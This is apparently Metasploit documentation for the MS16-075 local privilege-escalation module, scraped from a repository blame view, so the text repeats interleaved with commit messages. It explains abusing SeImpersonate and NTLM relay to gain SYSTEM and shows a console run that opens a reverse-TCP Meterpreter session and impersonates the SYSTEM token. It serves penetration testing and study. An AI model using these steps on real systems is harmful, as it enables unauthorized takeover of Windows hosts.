documentation/modules/exploit/windows/local/ms16_075_reflection.md

## Introduction

  This module will abuse the SeImperonsate privilege commonly found in
services due to the requirement to impersonate a client upon
authentication. As such it is possible to impersonate the SYSTEM account
and relay its NTLM hash to RPC via DCOM. The DLL will perform a MiTM
attack at which intercepts the hash and relay responses from RPC to be
able to establish a handle to a new SYSTEM token. Some caveats : Set
your target option to match the architecture of your Meterpreter
session, else it will inject the wrong architecture DLL into the process
of a separate architecture. Additionally, after you have established a
session, you must use incognito to imperonsate the SYSTEM Token.

## Build Instructions

This builds using visual studio 2017 and tools v141.  Attempts
to compile with previous verstions of build tools will succeed but
the resulting binary fails to exploit the vulnerability.

## Usage

  You'll first need to obtain a session on the target system.
  Next, once the module is loaded, one simply needs to set the
```payload``` and ```session``` options, in addition to architecture.

  Your user at which you are trying to exploit must have `SeImpersonate`
privileges.

  The module has a hardcoded timeout of 20 seconds, as the attack may
not work immediately and take a few seconds to start. Also, check to
make sure port 6666 is inherently not in use else the exploit will not
run properly.

## Scenarios

```
  Name Current Setting Required Description
   ---- --------------- -------- -----------
   SESSION 48 yes The session to run this module on. Payload options
(windows/x64/meterpreter/reverse_tcp):
   Name Current Setting Required Description
   ---- --------------- -------- -----------
   EXITFUNC thread yes Exit technique (Accepted: '', seh, thread,
process, none)
   LHOST ens3 yes The listen address (an interface may be specified)
   LPORT 3312 yes The listen port Exploit target:
   Id Name
   -- ----
   1 Windows x64 msf exploit(windows/local/ms16_075_reflection) > run
[*] Started reverse TCP handler on -snip-:3312
[+] Reflectively injecting the exploit DLL and triggering the exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (206403 bytes) to -snip-
[*] Meterpreter session 49 opened (-snip-:3312 -> -snip-:55306) at 2018-08-03 01:54:18 -0400
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > impersonate_token
'NT AUTHORITY\SYSTEM'
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getsystem -t 1 ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >
```
Don't be lazy and spell out "introduction" in docs 2019-09-30 16:58:00 -05:00			`## Introduction`
catch false positive spaces at eol from code indent 2020-01-28 14:28:18 -05:00
			`This module will abuse the SeImperonsate privilege commonly found in`
			`services due to the requirement to impersonate a client upon`
			`authentication. As such it is possible to impersonate the SYSTEM account`
			`and relay its NTLM hash to RPC via DCOM. The DLL will perform a MiTM`
			`attack at which intercepts the hash and relay responses from RPC to be`
			`able to establish a handle to a new SYSTEM token. Some caveats : Set`
			`your target option to match the architecture of your Meterpreter`
			`session, else it will inject the wrong architecture DLL into the process`
spelling fixes on docs 2023-10-10 14:46:18 -04:00			`of a separate architecture. Additionally, after you have established a`
Add note about compiling problems 2018-10-04 16:42:23 -05:00			`session, you must use incognito to imperonsate the SYSTEM Token.`

			`## Build Instructions`
catch false positive spaces at eol from code indent 2020-01-28 14:28:18 -05:00
Add note about compiling problems 2018-10-04 16:42:23 -05:00			`This builds using visual studio 2017 and tools v141. Attempts`
			`to compile with previous verstions of build tools will succeed but`
			`the resulting binary fails to exploit the vulnerability.`

			`## Usage`
catch false positive spaces at eol from code indent 2020-01-28 14:28:18 -05:00
Add note about compiling problems 2018-10-04 16:42:23 -05:00			`You'll first need to obtain a session on the target system.`
catch false positive spaces at eol from code indent 2020-01-28 14:28:18 -05:00			`Next, once the module is loaded, one simply needs to set the`
Add note about compiling problems 2018-10-04 16:42:23 -05:00			```payload``` and ```session``` options, in addition to architecture.
catch false positive spaces at eol from code indent 2020-01-28 14:28:18 -05:00
			Your user at which you are trying to exploit must have `SeImpersonate`
Add note about compiling problems 2018-10-04 16:42:23 -05:00			`privileges.`
catch false positive spaces at eol from code indent 2020-01-28 14:28:18 -05:00
			`The module has a hardcoded timeout of 20 seconds, as the attack may`
			`not work immediately and take a few seconds to start. Also, check to`
			`make sure port 6666 is inherently not in use else the exploit will not`
			`run properly.`

scenario to scenarios 2020-01-16 10:36:38 -05:00			`## Scenarios`
catch false positive spaces at eol from code indent 2020-01-28 14:28:18 -05:00
Add note about compiling problems 2018-10-04 16:42:23 -05:00			```
			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
Update documentation where possible for changed exploits 2021-07-20 15:54:09 -05:00			`SESSION 48 yes The session to run this module on. Payload options`
Add note about compiling problems 2018-10-04 16:42:23 -05:00			`(windows/x64/meterpreter/reverse_tcp):`
			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
Update documentation where possible for changed exploits 2021-07-20 15:54:09 -05:00			`EXITFUNC thread yes Exit technique (Accepted: '', seh, thread,`
Add note about compiling problems 2018-10-04 16:42:23 -05:00			`process, none)`
			`LHOST ens3 yes The listen address (an interface may be specified)`
			`LPORT 3312 yes The listen port Exploit target:`
			`Id Name`
			`-- ----`
Update documentation where possible for changed exploits 2021-07-20 15:54:09 -05:00			`1 Windows x64 msf exploit(windows/local/ms16_075_reflection) > run`
Add note about compiling problems 2018-10-04 16:42:23 -05:00			`[*] Started reverse TCP handler on -snip-:3312`
Update documentation where possible for changed exploits 2021-07-20 15:54:09 -05:00			`[+] Reflectively injecting the exploit DLL and triggering the exploit...`
Add note about compiling problems 2018-10-04 16:42:23 -05:00			`[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.`
			`[*] Sending stage (206403 bytes) to -snip-`
			`[*] Meterpreter session 49 opened (-snip-:3312 -> -snip-:55306) at 2018-08-03 01:54:18 -0400`
Update documentation where possible for changed exploits 2021-07-20 15:54:09 -05:00			`meterpreter > load incognito`
Add note about compiling problems 2018-10-04 16:42:23 -05:00			`Loading extension incognito...Success.`
Update documentation where possible for changed exploits 2021-07-20 15:54:09 -05:00			`meterpreter > impersonate_token`
Add note about compiling problems 2018-10-04 16:42:23 -05:00			`'NT AUTHORITY\SYSTEM'`
			`[-] Warning: Not currently running as SYSTEM, not all tokens will be available`
			`Call rev2self if primary process token is SYSTEM`
			`[-] No delegation token available`
			`[+] Successfully impersonated user NT AUTHORITY\SYSTEM`
			`meterpreter > getsystem -t 1 ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).`
Update documentation where possible for changed exploits 2021-07-20 15:54:09 -05:00			`meterpreter >`
Add note about compiling problems 2018-10-04 16:42:23 -05:00			```